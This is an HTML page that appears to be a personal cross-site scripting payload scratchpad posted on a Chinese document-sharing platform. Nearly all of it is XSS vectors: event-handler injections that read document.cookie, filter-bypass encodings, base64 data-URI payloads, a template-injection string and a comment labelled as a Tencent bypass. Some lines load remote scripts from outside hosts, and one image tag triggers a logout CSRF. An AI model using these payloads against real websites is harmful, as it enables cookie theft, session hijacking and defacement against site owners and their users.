111111111

#<h1>test</
测试

11111

aa<a href='//qq.com'>a</a>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <!-- 用于反射处 https://x.com/BRuteLogic/status/1833154481476747592-->
    <A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>

    <iframe%20src="https://tupac-2pac.github.io/xss.js"></iframe>
    <iframe%20src="https://tupac-2pac.github.io/index.html"></iframe>
    <!--  -->

    %bf<script/%bf>alert(1);%bf</script/%bf>
    
    <!-- <u%20tabindex=1%20onbeforecopy=1>11</u> -->
    <!-- <u id=x tabindex=1 onfocus=alert(1)></u> -->

    <!-- <u id=x tabindex=1" onfocus=alert(1)> >11</u> -->

    <!-- <u%20id=x%20tabindex=1"><a%20href="1"%20style="color:red">点我看色色</a></u>
    <u%20id=x%20tabindex=1"><img%20src="https://study.163.com/passport/member/logout.htm"></u>

    // 自动触发
    <input/onfocusin=alert(document.cookie) autofocus/placeholder=''>
    <input/onfocusin=alert(document.cookie) autofocus/placeholder>
    <input/onfocusin=alert(document.cookie)/autofocus>
    
    <u%20id=x%20tabindex=1"><xmp>1</xmp></u>
    <u>111</u>
    <u>222</u> -->
    a<input%20onfocusin="prompt``">
    
    <a/href='javascript:top[`alert`](1)'>bbb</a>

    <a/href='javascript:window.self[`\x61\x6c\x65\x72\x74`](1);'>bbb</a>


    <a href="javascript:top['aler'+'t'](1)" target="_blank">aa1</a>    <!-- 加了target="_blank"的不能执行xss 可以试试csrf -->

    <a href="javascript:top['aler'+'t'](1)">aaa</a>

    <a href="javascript:top['alert'](1)">bbb</a>

    <a/href="javascript:top[`console.log`](1)">bbb</a>
    </textarea><u>aaa</u><a/href='javascript:top[`alert`](1)'>bbb</a>

    <img/src/onerror=console.log/*1337*/(1)>
<img/src/onerror=alert//&NewLine;(2)>
<img/src/onerror=alert&sol;**&sol;(3)>

<!-- 火狐专用 -->
<a href='' target='_blank' download>a</a>
<a href='' download>a</a>

<!-- 鼠标中键弹窗 -->
<a href='javascript:alert()'>a</a>



<a/href="javascript:confirm()">确认</a><br/>
<a href='&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#51;&#51;&#51;&#41;'>HTML转码</a>

<svg/onload=alert()></svg>

<input%20onfocusin=alert(document.cookie)%0a>

<!-- 腾讯xss绕过 -->
<img/src/onerror%1a=a%1alert(1)>

<img/src/onerror=alert(document%2ecookie)>
<script>
    
</script>
<input/oninput='alert/*(*/(/*)*/)'>
    
    <img src="x" onerror="eval(atob('YWxlcnQoJ3h4cycp'));">

<a href='jAvascript:xxx:alert(1)'>sss</a>

<a href="jAvascript:x:window.self['a'+'l'+'e'+'rt'](1);">test</a>


<a href='javascript:x:window.self["\x61\x6c\x65\x72\x74"](document.cookie);'>test</a>

<svg onload="javascript:x:window.self['a'+'l'+'e'+'rt'](1)">

<svg oNload="javascript:top['alert'](10)">

    <iframe/src="data:text/html;base64,PG9iamVjdCBkYXRhPWRhdGE6dGV4dC9odG1sO2Jhc2U2NCxQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDQ9Pjwvb2JqZWN0Pg=="></iframe>

    <img src="asdsaddd"onerror="javascript:s:window.self['a'+'l'+'e'+'rt'](33)">

    <!-- <u%20id=x%20tabindex=1"><a%20href=x%20onmouseover="alert('xss');">1</a></u> -->
    <img/src=x/onerror=console.log(1)>

    <div class="col-lg-8">
        <textarea name="ad3" class="form-control col-lg-12" placeholder="ad-2"></textarea>
        </div>
    
    <!-- <u id=x tabindex=1 onfocus=top['ale'+'rt'](2222)>22</u> -->

   

    <!-- 
        <u%20id=x%20tabindex=1%20onfocus=top['ale'+'rt'](2222)>22</u>
     -->

    <br>

    "><img/src/onerror=alert(document.domain)>
    <input%20onfocusin=alert(document.cookie)%0a>
    
    <!-- 
        %22%3E%3Cimg/src/onerror%3dalert(document.domain)%3E
     -->
     <img%0dg%20src%20one%0drror=al%0dert(1)>

     <input/oninput=_=alert,_(1)>

     <input oninput=alert(1) value=xss>
<input/oninput=alert(1)>
<svg+on/load=alert()//

<svg onload=alert()//

<svg onload=alert()></svg>//

<input autofocus="" onfocus="alert();" />

<marquee onstart=confirm(1);//在firefox下有效>

<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=">


<img src=x onerror=d=document;e=d.createElement('script');e.src='http://127.0.0.1/eXploit.js';d.body.appendChild(e);>

{{constructor.constructor('alert(`XSS`)')()}}

?cc=xxxx%22};%0Avar%20a%20=%20%27aler%27,b=%27t(document%27,c='.cookie)';%0Avar%20d%20=%20a.concat(b).concat(c);;%0AFunction(d)();//


<a href="javascript    :alert()">
<a href="javascript
:alert()">
<a href="javascript:    alert()">

<iframe%20src="&#34; target=&#34;_blank&#34; class=&#34;kdocs-fontSize &#34; style=&#34;font-size:9pt; color:#0A6CFF;&#34;&gt;https://tupac-2pac.github.io/index.html&#34;&gt;&lt;/iframe&gt;

<u>aaaa</u>

<img src=x onerror=d=document;e=d.createElement('script');e.src='http://127.0.0.1/eXploit.js&#39;;d.body.appendChild(e);&gt;

<a href='https://www.wps.cn'>a</a>

投票1111(2选1)
  • 1111 0
  • 222 0
0人参与 截止时间:2025/04/10 10:30:54
WPS演示 WPS演示 保存输出
广东省
浏览 57
收藏
点赞
分享
+1
+1
全部评论